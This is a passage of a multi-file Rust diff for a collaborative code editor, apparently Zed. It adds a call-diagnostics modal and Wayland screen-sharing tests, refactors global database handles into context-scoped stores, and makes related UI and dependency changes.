+ let client_b = server.create_client(cx_b, "user_b").await;
+ server
+ .make_contacts(&mut [(&client_a, cx_a), (&client_b, cx_b)])
+ .await;
+
+ let active_call_a = cx_a.read(ActiveCall::global);
+ let active_call_b = cx_b.read(ActiveCall::global);
+
+ // User A calls user B.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.invite(client_b.user_id().unwrap(), None, cx)
+ })
+ .await
+ .unwrap();
+
+ // User B accepts.
+ let mut incoming_call_b = active_call_b.read_with(cx_b, |call, _| call.incoming());
+ executor.run_until_parked();
+ incoming_call_b.next().await.unwrap().unwrap();
+ active_call_b
+ .update(cx_b, |call, cx| call.accept_incoming(cx))
+ .await
+ .unwrap();
+
+ let room_a = active_call_a.read_with(cx_a, |call, _| call.room().unwrap().clone());
+ executor.run_until_parked();
+
+ // User A shares their screen via the Wayland path.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.room()
+ .unwrap()
+ .update(cx, |room, cx| room.share_screen_wayland(cx))
+ })
+ .await
+ .unwrap();
+ executor.run_until_parked();
+
+ room_a.read_with(cx_a, |room, _| {
+ assert!(room.is_sharing_screen());
+ });
+
+ // User A stops sharing.
+ room_a
+ .update(cx_a, |room, cx| room.unshare_screen(true, cx))
+ .unwrap();
+ executor.run_until_parked();
+
+ // Room A is no longer sharing, screen ID is gone.
+ room_a.read_with(cx_a, |room, _| {
+ assert!(!room.is_sharing_screen());
+ assert!(room.shared_screen_id().is_none());
+ });
+}
+
#[gpui::test]
async fn test_right_click_menu_behind_collab_panel(cx: &mut TestAppContext) {
let mut server = TestServer::start(cx.executor().clone()).await;
@@ -473,7 +473,7 @@ async fn test_ssh_collaboration_git_worktrees(
repo_b.update(cx, |repo, _| {
repo.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("feature-branch"),
Some("abc123".to_string()),
)
})
@@ -491,7 +491,10 @@ async fn test_ssh_collaboration_git_worktrees(
.unwrap();
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
let server_worktrees = {
@@ -518,6 +521,122 @@ async fn test_ssh_collaboration_git_worktrees(
server_worktrees[1].path,
worktree_directory.join("feature-branch")
);
+
+ // Host (client A) renames the worktree via SSH
+ let repo_a = cx_a.update(|cx| {
+ project_a
+ .read(cx)
+ .repositories(cx)
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ });
+ cx_a.update(|cx| {
+ repo_a.update(cx, |repository, _| {
+ repository.rename_worktree(
+ PathBuf::from("/project/feature-branch"),
+ PathBuf::from("/project/renamed-branch"),
+ )
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+
+ executor.run_until_parked();
+
+ let host_worktrees = cx_a
+ .update(|cx| repo_a.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ host_worktrees.len(),
+ 2,
+ "Host should still have 2 worktrees after rename"
+ );
+ assert_eq!(
+ host_worktrees[1].path,
+ PathBuf::from("/project/renamed-branch")
+ );
+
+ let server_worktrees = {
+ let server_repo = server_cx.update(|cx| {
+ headless_project.update(cx, |headless_project, cx| {
+ headless_project
+ .git_store
+ .read(cx)
+ .repositories()
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ })
+ });
+ server_cx
+ .update(|cx| server_repo.update(cx, |repo, _| repo.worktrees()))
+ .await
+ .unwrap()
+ .unwrap()
+ };
+ assert_eq!(
+ server_worktrees.len(),
+ 2,
+ "Server should still have 2 worktrees after rename"
+ );
+ assert_eq!(
+ server_worktrees[1].path,
+ PathBuf::from("/project/renamed-branch")
+ );
+
+ // Host (client A) removes the renamed worktree via SSH
+ cx_a.update(|cx| {
+ repo_a.update(cx, |repository, _| {
+ repository.remove_worktree(PathBuf::from("/project/renamed-branch"), false)
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+
+ executor.run_until_parked();
+
+ let host_worktrees = cx_a
+ .update(|cx| repo_a.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ host_worktrees.len(),
+ 1,
+ "Host should only have the main worktree after removal"
+ );
+
+ let server_worktrees = {
+ let server_repo = server_cx.update(|cx| {
+ headless_project.update(cx, |headless_project, cx| {
+ headless_project
+ .git_store
+ .read(cx)
+ .repositories()
+ .values()
+ .next()
+ .unwrap()
+ .clone()
+ })
+ });
+ server_cx
+ .update(|cx| server_repo.update(cx, |repo, _| repo.worktrees()))
+ .await
+ .unwrap()
+ .unwrap()
+ };
+ assert_eq!(
+ server_worktrees.len(),
+ 1,
+ "Server should only have the main worktree after removal"
+ );
}
#[gpui::test]
@@ -40,6 +40,7 @@ editor.workspace = true
futures.workspace = true
fuzzy.workspace = true
gpui.workspace = true
+livekit_client.workspace = true
log.workspace = true
menu.workspace = true
notifications.workspace = true
@@ -59,6 +60,7 @@ title_bar.workspace = true
ui.workspace = true
util.workspace = true
workspace.workspace = true
+zed_actions.workspace = true
[dev-dependencies]
call = { workspace = true, features = ["test-support"] }
@@ -0,0 +1,270 @@
+use call::{ActiveCall, Room, room};
+use gpui::{
+ DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, Render, Subscription,
+ Window,
+};
+use livekit_client::ConnectionQuality;
+use ui::prelude::*;
+use workspace::{ModalView, Workspace};
+use zed_actions::ShowCallStats;
+
+pub fn init(cx: &mut App) {
+ cx.observe_new(|workspace: &mut Workspace, _, _cx| {
+ workspace.register_action(|workspace, _: &ShowCallStats, window, cx| {
+ workspace.toggle_modal(window, cx, |_window, cx| CallStatsModal::new(cx));
+ });
+ })
+ .detach();
+}
+
+pub struct CallStatsModal {
+ focus_handle: FocusHandle,
+ _active_call_subscription: Option<Subscription>,
+ _diagnostics_subscription: Option<Subscription>,
+}
+
+impl CallStatsModal {
+ fn new(cx: &mut Context<Self>) -> Self {
+ let mut this = Self {
+ focus_handle: cx.focus_handle(),
+ _active_call_subscription: None,
+ _diagnostics_subscription: None,
+ };
+
+ if let Some(active_call) = ActiveCall::try_global(cx) {
+ this._active_call_subscription =
+ Some(cx.subscribe(&active_call, Self::handle_call_event));
+ this.observe_diagnostics(cx);
+ }
+
+ this
+ }
+
+ fn observe_diagnostics(&mut self, cx: &mut Context<Self>) {
+ let diagnostics = active_room(cx).and_then(|room| room.read(cx).diagnostics().cloned());
+
+ if let Some(diagnostics) = diagnostics {
+ self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify()));
+ } else {
+ self._diagnostics_subscription = None;
+ }
+ }
+
+ fn handle_call_event(
+ &mut self,
+ _: Entity<ActiveCall>,
+ event: &room::Event,
+ cx: &mut Context<Self>,
+ ) {
+ match event {
+ room::Event::RoomJoined { .. } => {
+ self.observe_diagnostics(cx);
+ }
+ room::Event::RoomLeft { .. } => {
+ self._diagnostics_subscription = None;
+ cx.notify();
+ }
+ _ => {}
+ }
+ }
+
+ fn dismiss(&mut self, _: &menu::Cancel, _: &mut Window, cx: &mut Context<Self>) {
+ cx.emit(DismissEvent);
+ }
+}
+
+fn active_room(cx: &App) -> Option<Entity<Room>> {
+ ActiveCall::try_global(cx)?.read(cx).room().cloned()
+}
+
+fn quality_label(quality: Option<ConnectionQuality>) -> (&'static str, Color) {
+ match quality {
+ Some(ConnectionQuality::Excellent) => ("Excellent", Color::Success),
+ Some(ConnectionQuality::Good) => ("Good", Color::Success),
+ Some(ConnectionQuality::Poor) => ("Poor", Color::Warning),
+ Some(ConnectionQuality::Lost) => ("Lost", Color::Error),
+ None => ("—", Color::Muted),
+ }
+}
+
+fn metric_rating(label: &str, value_ms: f64) -> (&'static str, Color) {
+ match label {
+ "Latency" => {
+ if value_ms < 100.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 300.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+ }
+ "Jitter" => {
+ if value_ms < 30.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 75.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+ }
+ _ => ("Normal", Color::Success),
+ }
+}
+
+fn input_lag_rating(value_ms: f64) -> (&'static str, Color) {
+ if value_ms < 20.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 50.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+}
+
+fn packet_loss_rating(loss_pct: f64) -> (&'static str, Color) {
+ if loss_pct < 1.0 {
+ ("Normal", Color::Success)
+ } else if loss_pct < 5.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+}
+
+impl EventEmitter<DismissEvent> for CallStatsModal {}
+impl ModalView for CallStatsModal {}
+
+impl Focusable for CallStatsModal {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+}
+
+impl Render for CallStatsModal {
+ fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let room = active_room(cx);
+ let is_connected = room.is_some();
+ let stats = room
+ .and_then(|room| {
+ let diagnostics = room.read(cx).diagnostics()?;
+ Some(diagnostics.read(cx).stats().clone())
+ })
+ .unwrap_or_default();
+
+ let (quality_text, quality_color) = quality_label(stats.connection_quality);
+
+ v_flex()
+ .key_context("CallStatsModal")
+ .on_action(cx.listener(Self::dismiss))
+ .track_focus(&self.focus_handle)
+ .elevation_3(cx)
+ .w(rems(24.))
+ .p_4()
+ .gap_3()
+ .child(
+ h_flex()
+ .justify_between()
+ .child(Label::new("Call Diagnostics").size(LabelSize::Large))
+ .child(
+ Label::new(quality_text)
+ .size(LabelSize::Large)
+ .color(quality_color),
+ ),
+ )
+ .when(!is_connected, |this| {
+ this.child(
+ h_flex()
+ .justify_center()
+ .py_4()
+ .child(Label::new("Not in a call").color(Color::Muted)),
+ )
+ })
+ .when(is_connected, |this| {
+ this.child(
+ v_flex()
+ .gap_1()
+ .child(
+ h_flex()
+ .gap_2()
+ .child(Label::new("Network").weight(FontWeight::SEMIBOLD)),
+ )
+ .child(self.render_metric_row(
+ "Latency",
+ "Time for data to travel to the server",
+ stats.latency_ms,
+ |v| format!("{:.0}ms", v),
+ |v| metric_rating("Latency", v),
+ ))
+ .child(self.render_metric_row(
+ "Jitter",
+ "Variance or fluctuation in latency",
+ stats.jitter_ms,
+ |v| format!("{:.0}ms", v),
+ |v| metric_rating("Jitter", v),
+ ))
+ .child(self.render_metric_row(
+ "Packet loss",
+ "Amount of data lost during transfer",
+ stats.packet_loss_pct,
+ |v| format!("{:.1}%", v),
+ |v| packet_loss_rating(v),
+ ))
+ .child(self.render_metric_row(
+ "Input lag",
+ "Delay from audio capture to WebRTC",
+ stats.input_lag.map(|d| d.as_secs_f64() * 1000.0),
+ |v| format!("{:.1}ms", v),
+ |v| input_lag_rating(v),
+ )),
+ )
+ })
+ }
+}
+
+impl CallStatsModal {
+ fn render_metric_row(
+ &self,
+ title: &str,
+ description: &str,
+ value: Option<f64>,
+ format_value: impl Fn(f64) -> String,
+ rate: impl Fn(f64) -> (&'static str, Color),
+ ) -> impl IntoElement {
+ let (rating_text, rating_color, value_text) = match value {
+ Some(v) => {
+ let (rt, rc) = rate(v);
+ (rt, rc, format_value(v))
+ }
+ None => ("—", Color::Muted, "—".to_string()),
+ };
+
+ h_flex()
+ .px_2()
+ .py_1()
+ .rounded_md()
+ .justify_between()
+ .child(
+ v_flex()
+ .child(Label::new(title.to_string()).size(LabelSize::Default))
+ .child(
+ Label::new(description.to_string())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ v_flex()
+ .items_end()
+ .child(
+ Label::new(rating_text)
+ .size(LabelSize::Default)
+ .color(rating_color),
+ )
+ .child(
+ Label::new(value_text)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ }
+}
@@ -9,7 +9,7 @@ use channel::{Channel, ChannelEvent, ChannelStore};
use client::{ChannelId, Client, Contact, User, UserStore};
use collections::{HashMap, HashSet};
use contact_finder::ContactFinder;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{Editor, EditorElement, EditorStyle};
use fuzzy::{StringMatch, StringMatchCandidate, match_strings};
use gpui::{
@@ -36,8 +36,8 @@ use ui::{
};
use util::{ResultExt, TryFutureExt, maybe};
use workspace::{
- CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, ScreenShare,
- ShareProject, Workspace,
+ CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, OpenChannelNotesById,
+ ScreenShare, ShareProject, Workspace,
dock::{DockPosition, Panel, PanelEvent},
notifications::{DetachAndPromptErr, NotifyResultExt},
};
@@ -114,6 +114,13 @@ pub fn init(cx: &mut App) {
});
}
});
+ workspace.register_action(|_, action: &OpenChannelNotesById, window, cx| {
+ let channel_id = client::ChannelId(action.channel_id);
+ let workspace = cx.entity();
+ window.defer(cx, move |window, cx| {
+ ChannelView::open(channel_id, None, workspace, window, cx).detach_and_log_err(cx)
+ });
+ });
// TODO: make it possible to bind this one to a held key for push to talk?
// how to make "toggle_on_modifiers_press" contextual?
workspace.register_action(|_, _: &Mute, _, cx| title_bar::collab::toggle_mute(cx));
@@ -164,6 +171,7 @@ pub fn init(cx: &mut App) {
});
});
});
+ // TODO(jk): Is this action ever triggered?
workspace.register_action(|_, _: &ScreenShare, window, cx| {
let room = ActiveCall::global(cx).read(cx).room().cloned();
if let Some(room) = room {
@@ -172,19 +180,32 @@ pub fn init(cx: &mut App) {
if room.is_sharing_screen() {
room.unshare_screen(true, cx).ok();
} else {
- let sources = cx.screen_capture_sources();
-
- cx.spawn(async move |room, cx| {
- let sources = sources.await??;
- let first = sources.into_iter().next();
- if let Some(first) = first {
- room.update(cx, |room, cx| room.share_screen(first, cx))?
- .await
- } else {
- Ok(())
+ #[cfg(target_os = "linux")]
+ let is_wayland = gpui::guess_compositor() == "Wayland";
+ #[cfg(not(target_os = "linux"))]
+ let is_wayland = false;
+
+ #[cfg(target_os = "linux")]
+ {
+ if is_wayland {
+ room.share_screen_wayland(cx).detach_and_log_err(cx);
}
- })
- .detach_and_log_err(cx);
+ }
+ if !is_wayland {
+ let sources = cx.screen_capture_sources();
+
+ cx.spawn(async move |room, cx| {
+ let sources = sources.await??;
+ let first = sources.into_iter().next();
+ if let Some(first) = first {
+ room.update(cx, |room, cx| room.share_screen(first, cx))?
+ .await
+ } else {
+ Ok(())
+ }
+ })
+ .detach_and_log_err(cx);
+ }
};
});
});
@@ -422,16 +443,17 @@ impl CollabPanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("reading collaboration panel from key value store")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedCollabPanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ kvp.read_kvp(&serialization_key)
+ .context("reading collaboration panel from key value store")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedCollabPanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -472,19 +494,19 @@ impl CollabPanel {
};
let width = self.width;
let collapsed_channels = self.collapsed_channels.clone();
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedCollabPanel {
- width,
- collapsed_channels: Some(
- collapsed_channels.iter().map(|cid| cid.0).collect(),
- ),
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedCollabPanel {
+ width,
+ collapsed_channels: Some(
+ collapsed_channels.iter().map(|cid| cid.0).collect(),
+ ),
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -2340,9 +2362,7 @@ impl CollabPanel {
.gap_2()
.child(
Button::new("sign_in", button_label)
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).color(Color::Muted))
.style(ButtonStyle::Filled)
.full_width()
.disabled(is_signing_in)
@@ -2590,9 +2610,9 @@ impl CollabPanel {
Section::Channels => {
Some(
h_flex()
- .gap_1()
.child(
IconButton::new("filter-active-channels", IconName::ListFilter)
+ .icon_size(IconSize::Small)
.toggle_state(self.filter_active_channels)
.when(!self.filter_active_channels, |button| {
button.visible_on_hover("section-header")
@@ -3209,7 +3229,7 @@ impl Panel for CollabPanel {
}
fn activation_priority(&self) -> u32 {
- 6
+ 5
}
}
@@ -1,3 +1,4 @@
+mod call_stats_modal;
pub mod channel_view;
pub mod collab_panel;
pub mod notification_panel;
@@ -18,6 +19,7 @@ use workspace::AppState;
// Another comment, nice.
pub fn init(app_state: &Arc<AppState>, cx: &mut App) {
+ call_stats_modal::init(cx);
channel_view::init(cx);
collab_panel::init(cx);
notification_panel::init(cx);
@@ -3,7 +3,7 @@ use anyhow::Result;
use channel::ChannelStore;
use client::{ChannelId, Client, Notification, User, UserStore};
use collections::HashMap;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures::StreamExt;
use gpui::{
AnyElement, App, AsyncWindowContext, ClickEvent, Context, DismissEvent, Element, Entity,
@@ -186,16 +186,13 @@ impl NotificationPanel {
cx: AsyncWindowContext,
) -> Task<Result<Entity<Self>>> {
cx.spawn(async move |cx| {
- let serialized_panel = if let Some(panel) = cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(NOTIFICATION_PANEL_KEY) })
- .await
- .log_err()
- .flatten()
- {
- Some(serde_json::from_str::<SerializedNotificationPanel>(&panel)?)
- } else {
- None
- };
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ let serialized_panel =
+ if let Some(panel) = kvp.read_kvp(NOTIFICATION_PANEL_KEY).log_err().flatten() {
+ Some(serde_json::from_str::<SerializedNotificationPanel>(&panel)?)
+ } else {
+ None
+ };
workspace.update_in(cx, |workspace, window, cx| {
let panel = Self::new(workspace, window, cx);
@@ -212,14 +209,14 @@ impl NotificationPanel {
fn serialize(&mut self, cx: &mut Context<Self>) {
let width = self.width;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- NOTIFICATION_PANEL_KEY.into(),
- serde_json::to_string(&SerializedNotificationPanel { width })?,
- )
- .await?;
+ kvp.write_kvp(
+ NOTIFICATION_PANEL_KEY.into(),
+ serde_json::to_string(&SerializedNotificationPanel { width })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -544,9 +541,7 @@ impl Render for NotificationPanel {
.p_4()
.child(
Button::new("connect_prompt_button", "Connect")
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).color(Color::Muted))
.style(ButtonStyle::Filled)
.full_width()
.on_click({
@@ -679,6 +674,9 @@ impl Panel for NotificationPanel {
}
fn icon_label(&self, _window: &Window, cx: &App) -> Option<String> {
+ if !NotificationPanelSettings::get_global(cx).show_count_badge {
+ return None;
+ }
let count = self.notification_store.read(cx).unread_notification_count();
if count == 0 {
None
@@ -692,7 +690,7 @@ impl Panel for NotificationPanel {
}
fn activation_priority(&self) -> u32 {
- 8
+ 3
}
}
@@ -15,6 +15,7 @@ pub struct NotificationPanelSettings {
pub button: bool,
pub dock: DockPosition,
pub default_width: Pixels,
+ pub show_count_badge: bool,
}
impl Settings for CollaborationPanelSettings {
@@ -36,6 +37,7 @@ impl Settings for NotificationPanelSettings {
button: panel.button.unwrap(),
dock: panel.dock.unwrap().into(),
default_width: panel.default_width.map(px).unwrap(),
+ show_count_badge: panel.show_count_badge.unwrap(),
};
}
}
@@ -18,7 +18,7 @@ use gpui::{
Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
ParentElement, Render, Styled, Task, WeakEntity, Window,
};
-use persistence::COMMAND_PALETTE_HISTORY;
+use persistence::CommandPaletteDB;
use picker::Direction;
use picker::{Picker, PickerDelegate};
use postage::{sink::Sink, stream::Stream};
@@ -33,7 +33,11 @@ pub fn init(cx: &mut App) {
cx.observe_new(CommandPalette::register).detach();
}
-impl ModalView for CommandPalette {}
+impl ModalView for CommandPalette {
+ fn is_command_palette(&self) -> bool {
+ true
+ }
+}
pub struct CommandPalette {
picker: Entity<Picker<CommandPaletteDelegate>>,
@@ -180,9 +184,9 @@ struct QueryHistory {
}
impl QueryHistory {
- fn history(&mut self) -> &mut VecDeque<String> {
+ fn history(&mut self, cx: &App) -> &mut VecDeque<String> {
self.history.get_or_insert_with(|| {
- COMMAND_PALETTE_HISTORY
+ CommandPaletteDB::global(cx)
.list_recent_queries()
.unwrap_or_default()
.into_iter()
@@ -190,18 +194,18 @@ impl QueryHistory {
})
}
- fn add(&mut self, query: String) {
- if let Some(pos) = self.history().iter().position(|h| h == &query) {
- self.history().remove(pos);
+ fn add(&mut self, query: String, cx: &App) {
+ if let Some(pos) = self.history(cx).iter().position(|h| h == &query) {
+ self.history(cx).remove(pos);
}
- self.history().push_back(query);
+ self.history(cx).push_back(query);
self.cursor = None;
self.prefix = None;
}
- fn validate_cursor(&mut self, current_query: &str) -> Option<usize> {
+ fn validate_cursor(&mut self, current_query: &str, cx: &App) -> Option<usize> {
if let Some(pos) = self.cursor {
- if self.history().get(pos).map(|s| s.as_str()) != Some(current_query) {
+ if self.history(cx).get(pos).map(|s| s.as_str()) != Some(current_query) {
self.cursor = None;
self.prefix = None;
}
@@ -209,39 +213,39 @@ impl QueryHistory {
self.cursor
}
- fn previous(&mut self, current_query: &str) -> Option<&str> {
- if self.validate_cursor(current_query).is_none() {
+ fn previous(&mut self, current_query: &str, cx: &App) -> Option<&str> {
+ if self.validate_cursor(current_query, cx).is_none() {
self.prefix = Some(current_query.to_string());
}
let prefix = self.prefix.clone().unwrap_or_default();
- let start_index = self.cursor.unwrap_or(self.history().len());
+ let start_index = self.cursor.unwrap_or(self.history(cx).len());
for i in (0..start_index).rev() {
if self
- .history()
+ .history(cx)
.get(i)
.is_some_and(|e| e.starts_with(&prefix))
{
self.cursor = Some(i);
- return self.history().get(i).map(|s| s.as_str());
+ return self.history(cx).get(i).map(|s| s.as_str());
}
}
None
}
- fn next(&mut self, current_query: &str) -> Option<&str> {
- let selected = self.validate_cursor(current_query)?;
+ fn next(&mut self, current_query: &str, cx: &App) -> Option<&str> {
+ let selected = self.validate_cursor(current_query, cx)?;
let prefix = self.prefix.clone().unwrap_or_default();
- for i in (selected + 1)..self.history().len() {
+ for i in (selected + 1)..self.history(cx).len() {
if self
- .history()
+ .history(cx)
.get(i)
.is_some_and(|e| e.starts_with(&prefix))
{
self.cursor = Some(i);
- return self.history().get(i).map(|s| s.as_str());
+ return self.history(cx).get(i).map(|s| s.as_str());
}
}
None
@@ -338,8 +342,8 @@ impl CommandPaletteDelegate {
/// Hit count for each command in the palette.
/// We only account for commands triggered directly via command palette and not by e.g. keystrokes because
/// if a user already knows a keystroke for a command, they are unlikely to use a command palette to look for it.
- fn hit_counts(&self) -> HashMap<String, u16> {
- if let Ok(commands) = COMMAND_PALETTE_HISTORY.list_commands_used() {
+ fn hit_counts(&self, cx: &App) -> HashMap<String, u16> {
+ if let Ok(commands) = CommandPaletteDB::global(cx).list_commands_used() {
commands
.into_iter()
.map(|command| (command.command_name, command.invocations))
@@ -378,21 +382,25 @@ impl PickerDelegate for CommandPaletteDelegate {
direction: Direction,
query: &str,
_window: &mut Window,
- _cx: &mut App,
+ cx: &mut App,
) -> Option<String> {
match direction {
Direction::Up => {
let should_use_history =
self.selected_ix == 0 || self.query_history.is_navigating();
if should_use_history {
- if let Some(query) = self.query_history.previous(query).map(|s| s.to_string()) {
+ if let Some(query) = self
+ .query_history
+ .previous(query, cx)
+ .map(|s| s.to_string())
+ {
return Some(query);
}
}
}
Direction::Down => {
if self.query_history.is_navigating() {
- if let Some(query) = self.query_history.next(query).map(|s| s.to_string()) {
+ if let Some(query) = self.query_history.next(query, cx).map(|s| s.to_string()) {
return Some(query);
} else {
let prefix = self.query_history.prefix.take().unwrap_or_default();
@@ -444,7 +452,7 @@ impl PickerDelegate for CommandPaletteDelegate {
let task = cx.background_spawn({
let mut commands = self.all_commands.clone();
- let hit_counts = self.hit_counts();
+ let hit_counts = self.hit_counts(cx);
let executor = cx.background_executor().clone();
let query = normalize_action_query(query_str);
let query_for_link = query_str.to_string();
@@ -566,7 +574,7 @@ impl PickerDelegate for CommandPaletteDelegate {
}
if !self.latest_query.is_empty() {
- self.query_history.add(self.latest_query.clone());
+ self.query_history.add(self.latest_query.clone(), cx);
self.query_history.reset_cursor();
}
@@ -581,9 +589,9 @@ impl PickerDelegate for CommandPaletteDelegate {
self.commands.clear();
let command_name = command.name.clone();
let latest_query = self.latest_query.clone();
+ let db = CommandPaletteDB::global(cx);
cx.background_spawn(async move {
- COMMAND_PALETTE_HISTORY
- .write_command_invocation(command_name, latest_query)
+ db.write_command_invocation(command_name, latest_query)
.await
})
.detach_and_log_err(cx);
@@ -771,11 +779,9 @@ mod tests {
#[gpui::test]
async fn test_command_palette(cx: &mut TestAppContext) {
- persistence::COMMAND_PALETTE_HISTORY
- .clear_all()
- .await
- .unwrap();
let app_state = init_test(cx);
+ let db = cx.update(|cx| persistence::CommandPaletteDB::global(cx));
+ db.clear_all().await.unwrap();
let project = Project::test(app_state.fs.clone(), [], cx).await;
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
@@ -69,7 +69,7 @@ impl Domain for CommandPaletteDB {
)];
}
-db::static_connection!(COMMAND_PALETTE_HISTORY, CommandPaletteDB, []);
+db::static_connection!(CommandPaletteDB, []);
impl CommandPaletteDB {
pub async fn write_command_invocation(
@@ -48,7 +48,10 @@ fn main() {
let user_store = cx.new(|cx| UserStore::new(client.clone(), cx));
let workspace_store = cx.new(|cx| WorkspaceStore::new(client.clone(), cx));
let session_id = uuid::Uuid::new_v4().to_string();
- let session = cx.foreground_executor().block_on(Session::new(session_id));
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ let session = cx
+ .foreground_executor()
+ .block_on(Session::new(session_id, kvp));
let session = cx.new(|cx| AppSession::new(session, cx));
let node_runtime = NodeRuntime::unavailable();
@@ -9,7 +9,7 @@ use gpui::{
use gpui::{ListState, ScrollHandle, ScrollStrategy, UniformListScrollHandle};
use language::LanguageRegistry;
use notifications::status_toast::{StatusToast, ToastIcon};
-use persistence::COMPONENT_PREVIEW_DB;
+use persistence::ComponentPreviewDb;
use project::Project;
use std::{iter::Iterator, ops::Range, sync::Arc};
use ui::{ButtonLike, Divider, HighlightedLabel, ListItem, ListSubHeader, Tooltip, prelude::*};
@@ -784,7 +784,7 @@ impl SerializableItem for ComponentPreview {
cx: &mut App,
) -> Task<anyhow::Result<Entity<Self>>> {
let deserialized_active_page =
- match COMPONENT_PREVIEW_DB.get_active_page(item_id, workspace_id) {
+ match ComponentPreviewDb::global(cx).get_active_page(item_id, workspace_id) {
Ok(page) => {
if let Some(page) = page {
ActivePageId(page)
@@ -845,7 +845,7 @@ impl SerializableItem for ComponentPreview {
alive_items,
workspace_id,
"component_previews",
- &COMPONENT_PREVIEW_DB,
+ &ComponentPreviewDb::global(cx),
cx,
)
}
@@ -860,9 +860,9 @@ impl SerializableItem for ComponentPreview {
) -> Option<Task<anyhow::Result<()>>> {
let active_page = self.active_page_id(cx);
let workspace_id = self.workspace_id?;
+ let db = ComponentPreviewDb::global(cx);
Some(cx.background_spawn(async move {
- COMPONENT_PREVIEW_DB
- .save_active_page(item_id, workspace_id, active_page.0)
+ db.save_active_page(item_id, workspace_id, active_page.0)
.await
}))
}
@@ -23,7 +23,7 @@ impl Domain for ComponentPreviewDb {
)];
}
-db::static_connection!(COMPONENT_PREVIEW_DB, ComponentPreviewDb, [WorkspaceDb]);
+db::static_connection!(ComponentPreviewDb, [WorkspaceDb]);
impl ComponentPreviewDb {
pub async fn save_active_page(
@@ -17,6 +17,7 @@ test-support = ["gpui/test-support"]
[dependencies]
anyhow.workspace = true
async-trait.workspace = true
+base64.workspace = true
collections.workspace = true
futures.workspace = true
gpui.workspace = true
@@ -24,14 +25,17 @@ http_client = { workspace = true, features = ["test-support"] }
log.workspace = true
net.workspace = true
parking_lot.workspace = true
+rand.workspace = true
postage.workspace = true
schemars.workspace = true
serde_json.workspace = true
serde.workspace = true
settings.workspace = true
+sha2.workspace = true
slotmap.workspace = true
smol.workspace = true
tempfile.workspace = true
+tiny_http.workspace = true
url = { workspace = true, features = ["serde"] }
util.workspace = true
terminal.workspace = true
@@ -35,7 +35,7 @@ pub const METHOD_NOT_FOUND: i32 = -32601;
pub const INVALID_PARAMS: i32 = -32602;
pub const INTERNAL_ERROR: i32 = -32603;
-type ResponseHandler = Box<dyn Send + FnOnce(Result<String, Error>)>;
+type ResponseHandler = Box<dyn Send + FnOnce(String)>;
type NotificationHandler = Box<dyn Send + FnMut(Value, AsyncApp)>;
type RequestHandler = Box<dyn Send + FnMut(RequestId, &RawValue, AsyncApp)>;
@@ -62,6 +62,14 @@ pub(crate) struct Client {
#[allow(dead_code)]
transport: Arc<dyn Transport>,
request_timeout: Option<Duration>,
